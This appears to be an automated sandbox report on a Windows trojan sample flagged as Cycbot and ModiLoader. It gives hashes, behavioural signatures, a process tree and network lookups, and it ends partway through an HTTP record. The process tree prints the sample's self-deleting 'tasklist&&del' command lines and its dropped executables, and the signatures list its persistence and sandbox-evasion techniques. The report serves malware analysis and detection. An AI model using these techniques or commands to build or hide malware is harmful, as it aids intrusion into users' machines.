Analysis

  • max time kernel
    87s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19/01/2025, 14:41 UTC

General

  • Target

    JaffaCakes118_ca91d7233de94df30ccbb02bcf7eb86d.exe

  • Size

    667KB

  • MD5

    ca91d7233de94df30ccbb02bcf7eb86d

  • SHA1

    7a96c6de2a629170e4bc24a81df72e24a87d77ae

  • SHA256

    1ae7b586ef1b22df289badb804323398d4672dcc9da455d89ffcf22814a31267

  • SHA512

    cd3687d7766f8fe2b80f319944cf8a128f34b243e45b3f0ad1973138445a95a4938df00941f917491dfaf379bdab9a53946426bf5a9e06d7c07a9e655c28a3f5

  • SSDEEP

    12288:WbMqmEEEb4E9F/ATyGv4XKGQi2lJLm1Giizl6oAlpxElrW1A:WIeEEb4Ev/ATEXKGVnGTzpA1Ec1A

Malware Config

Signatures

  • Cycbot

    Cycbot is a backdoor and trojan written in C++.

  • Cycbot family
  • Detects Cycbot payload 5 IoCs

    Cycbot is a backdoor and trojan written in C++.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies security service 2 TTPs 1 IoCs
  • Modifies visibility of hidden/system files in Explorer 2 TTPs 2 IoCs
  • Modiloader family
  • ModiLoader Second Stage 7 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 11 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Disables taskbar notifications via registry modification
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Adds Run key to start application 2 TTPs 52 IoCs
  • Enumerates connected drives 3 TTPs 22 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 17 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 16 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ca91d7233de94df30ccbb02bcf7eb86d.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ca91d7233de94df30ccbb02bcf7eb86d.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1520
    • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ca91d7233de94df30ccbb02bcf7eb86d.exe
      JaffaCakes118_ca91d7233de94df30ccbb02bcf7eb86d.exe
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3320
      • C:\Users\Admin\DV245F.exe
        C:\Users\Admin\DV245F.exe
        3⤵
        • Modifies visibility of hidden/system files in Explorer
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2676
        • C:\Users\Admin\qwjuiw.exe
          "C:\Users\Admin\qwjuiw.exe"
          4⤵
          • Modifies visibility of hidden/system files in Explorer
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2980
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c tasklist&&del DV245F.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3404
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:3976
      • C:\Users\Admin\aohost.exe
        C:\Users\Admin\aohost.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3136
        • C:\Users\Admin\aohost.exe
          aohost.exe
          4⤵
          • Executes dropped EXE
          • Maps connected drives based on registry
          • Suspicious behavior: EnumeratesProcesses
          PID:3168
      • C:\Users\Admin\bohost.exe
        C:\Users\Admin\bohost.exe
        3⤵
        • Modifies security service
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:2272
        • C:\Users\Admin\bohost.exe
          C:\Users\Admin\bohost.exe startC:\Users\Admin\AppData\Roaming\D0769\E71E4.exe%C:\Users\Admin\AppData\Roaming\D0769
          4⤵
          • Executes dropped EXE
          PID:4864
        • C:\Users\Admin\bohost.exe
          C:\Users\Admin\bohost.exe startC:\Program Files (x86)\69E3C\lvvm.exe%C:\Program Files (x86)\69E3C
          4⤵
          • Executes dropped EXE
          PID:4760
      • C:\Users\Admin\dohost.exe
        C:\Users\Admin\dohost.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2144
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c tasklist&&del JaffaCakes118_ca91d7233de94df30ccbb02bcf7eb86d.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4172
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist
          4⤵
          • Enumerates processes with tasklist
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4244
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4884
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3560
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:4908
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2072
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:3780
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:412
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious use of SendNotifyMessage
    PID:4724
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2948
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious use of SendNotifyMessage
    PID:4028
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3644
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:4108
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:4832
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1048
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2948
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:4648
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2676
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:1052
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:2072
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:4744
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2368
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:2016
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3292
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:1220
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:1492
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1776
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:1448
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:1180
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1176
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:644
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:4444
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:3212
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:968
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:2632
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:3972
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:4980
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:3248
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:1580
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:3564
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:548
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:3800
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:3776
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:4212
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:4484
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:1676
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:2668
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:1776
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:3084
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:4972
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:4120
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:3852
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:4760
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:3216
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:4832
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:4224
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:2464
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:1048
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:1772
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:2676
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:1008
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:3564
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:1352
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:2200
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:3988
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:2180
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:3892
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:4128
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:4116
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:3820
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:5068
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:5028
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:632

Network

  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    71.31.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    71.31.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    167.173.78.104.in-addr.arpa
    Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      167.173.78.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      167.173.78.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      a104-78-173-167deploystaticakamaitechnologiescom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      228.249.119.40.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      228.249.119.40.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      evcs-ocsp.ws.symantec.com
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      evcs-ocsp.ws.symantec.com
                                                                                      IN A
                                                                                      Response
                                                                                      evcs-ocsp.ws.symantec.com
                                                                                      IN CNAME
                                                                                      mpki-ocsp.digicert.com
                                                                                      mpki-ocsp.digicert.com
                                                                                      IN CNAME
                                                                                      mpki-ocsp.edge.digicert.com
                                                                                      mpki-ocsp.edge.digicert.com
                                                                                      IN CNAME
                                                                                      pki-ocsp.digicert.com.edgekey.net
                                                                                      pki-ocsp.digicert.com.edgekey.net
                                                                                      IN CNAME
                                                                                      e3782.cd.akamaiedge.net
                                                                                      e3782.cd.akamaiedge.net
                                                                                      IN A
                                                                                      104.78.173.45
                                                                                    • flag-gb
                                                                                      GET
                                                                                      http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D
                                                                                      Remote address:
                                                                                      104.78.173.45:80
                                                                                      Request
                                                                                      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      User-Agent: Microsoft-CryptoAPI/10.0
                                                                                      Host: evcs-ocsp.ws.symantec.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Content-Type: application/ocsp-response
                                                                                      Content-Length: 5
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-Frame-Options: SAMEORIGIN
